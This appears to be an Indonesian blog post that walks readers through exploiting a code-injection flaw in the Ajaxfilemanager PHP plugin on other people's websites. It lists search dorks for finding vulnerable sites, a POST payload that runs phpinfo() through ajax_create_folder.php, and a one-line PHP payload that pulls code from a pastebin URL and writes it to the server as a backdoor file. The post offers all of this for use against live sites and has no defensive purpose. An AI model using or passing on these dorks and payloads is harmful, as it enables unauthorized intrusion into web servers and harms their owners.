ok langsung saja kita coba
pertama siapin plugins adds on Firefox Hackbar
jika sudah langsung nyalain hackbar nya (di bagian atas firefox klik kanan centang hackbar )
setelah hackbar muncul, ada tulisan Enable postdata di centang
dork :
Index Of Ajaxfilemanager
Index Of /inc/data.php
inurl:/Ajaxfilemanager
Jika sudah dapat, cek dulu bugnya di file Ajax_create_folder.php dan data.php
Jika di Execute tidak ada apapun , atau error 403 Forbiden dll , maka hasilnya kita bisa lihat di direktori /ajaxfilemanager/inc/data.php
Jika hasil test bug kita bisa di eksekusi, sekarang kita coba dengan script kecil/ringan
test=<?php phpinfo(); ?>
lalu tekan execute di menu Hackbar. dan hasilnya seperti gambar dibawah ini.
jika muncul seperti gambar ini berarti kita bisa di eksekusi seperti upload file ke server atau upload backdoor , bisa menggunakan wget , file get contents , ataupun file put contents ,
contoh payload nya seperti ini:
<?phpfile_put_contents('aaa.php',file_get_contents('http://pastebin.com/raw/xxxxx'));?>
sekian semoga bermanfaat
Share This :
comment 0 komentar
more_vert